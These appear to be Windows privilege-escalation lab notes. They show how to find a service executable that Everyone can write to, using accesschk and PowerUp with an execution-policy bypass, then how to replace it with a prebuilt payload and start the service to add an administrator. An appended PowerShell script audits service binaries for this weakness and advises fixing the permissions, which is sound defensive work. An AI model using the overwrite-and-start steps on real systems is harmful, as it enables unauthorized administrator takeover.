- Executables with FILE_ALL_ACCESS permission
Check in CMD:
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
filepermservice.exe has FILE_ALL_ACCESS for Everyone! (we can exploit it!)
Check in PowerUp (via PowerShell) (this is more realistic):
Shift + right-click in the PowerUp folder and open a cmd window
powershell
powershell -ep bypass
. .\PowerUp.PS1
Invoke-AllChecks   # type Invoke- and press Tab to autocomplete
Exploitation:
Assumes x.exe, which we created for the regsvc ACL case, is already in the Temp folder on the Windows machine
Windows CMD:
copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
sc start filepermsvc
Check for users added:
net localgroup administrators
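
The accesschk and PowerUp checks above look at one service folder. As an added example (not part of the original notes and not PowerUp's own code), this PowerShell audit generalizes the same check to every installed service and reports binaries that broad groups can overwrite. The SID list and the helper name Get-ServiceBinaryPath are assumptions chosen for illustration.

```powershell
# Added example: audit all service binaries for write access held by broad groups.
# Well-known SIDs (language-independent): Everyone, Authenticated Users, BUILTIN\Users, INTERACTIVE.
$broadSids = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4'

# File rights that allow replacing or re-permissioning the binary.
$writeMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'

# Hypothetical helper: extract the executable path from a service's PathName,
# which may be quoted and may carry arguments.
function Get-ServiceBinaryPath([string]$PathName) {
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)') { return $Matches[1] }
    return $null
}

$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $path = Get-ServiceBinaryPath $svc.PathName
    if (-not $path -or -not (Test-Path -LiteralPath $path -PathType Leaf)) { continue }

    $acl = Get-Acl -LiteralPath $path -ErrorAction SilentlyContinue
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }   # unresolvable principal, skip this ACE
        if ($broadSids -notcontains $sid) { continue }

        if ($ace.FileSystemRights -band $writeMask) {
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                Binary    = $path
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

$findings | Sort-Object Service | Format-Table -AutoSize -Wrap
```

Any row is a service whose executable a low-privileged account can overwrite, which matters most when RunsAs is LocalSystem. Remove the write ACE for that principal so only Administrators, SYSTEM and TrustedInstaller can modify the file.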